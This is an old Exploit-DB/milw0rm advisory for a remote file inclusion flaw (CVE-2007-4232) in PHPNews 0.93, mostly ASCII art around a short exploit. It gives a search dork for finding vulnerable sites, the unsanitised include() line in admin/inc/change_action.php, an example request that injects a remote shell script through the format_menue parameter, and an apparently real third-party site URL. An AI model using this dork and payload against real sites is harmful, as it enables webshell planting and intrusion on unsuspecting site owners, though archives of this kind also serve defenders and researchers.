PHPNews 0.93 format_menue Remote File Inclusion Vulnerability

2007-08-07T00:00:00
ID EDB-ID:4268
Type exploitdb
Reporter kezzap66345
Modified 2007-08-07T00:00:00

Description

PHPNews 0.93 (format_menue) Remote File Inclusion Vulnerability. CVE-2007-4232. Webapps exploit for php platform

                                        
                                            ?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
##############################################################################################
##############################################################################################
##############################################################################################
##############################################################################################

# PHPNews <=  Remote File Inclusion Vulnerability
#
#Dork:"PHPNews Version 0.93"
#
#Vuln Code
##############################################################################################
##############################################################################################
##############################################################################################
#
#ERROR1:admin/inc/change_action.php
#
#<?PHP
       include ("$format_menue");
#?>   <<< RFI CODE
#
#
#BUG1:admin/inc/change_action.php?format_menue=
#
#Example1:http://site.com/path/admin/inc/change_action.php?format_menue=[[Sh3LLScript]]
#
##############################################################################################
##############################################################################################
##############################################################################################
#
#http://www.crear.de/2003/dienste/phpdownloadlinks_0.6/load_page.php?uid=9
#
##############################################################################################
##############################################################################################
##############################################################################################
#
#LEETSECURITY.ORG <<<< sanal alemde bizde variz...(Aรงiklar bundan sonra ilk LeetSecurity'de)
#
#
#####special thanx:###..Str0ke..####..KEZZAP66345..####..Wocker..#############################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-08-07]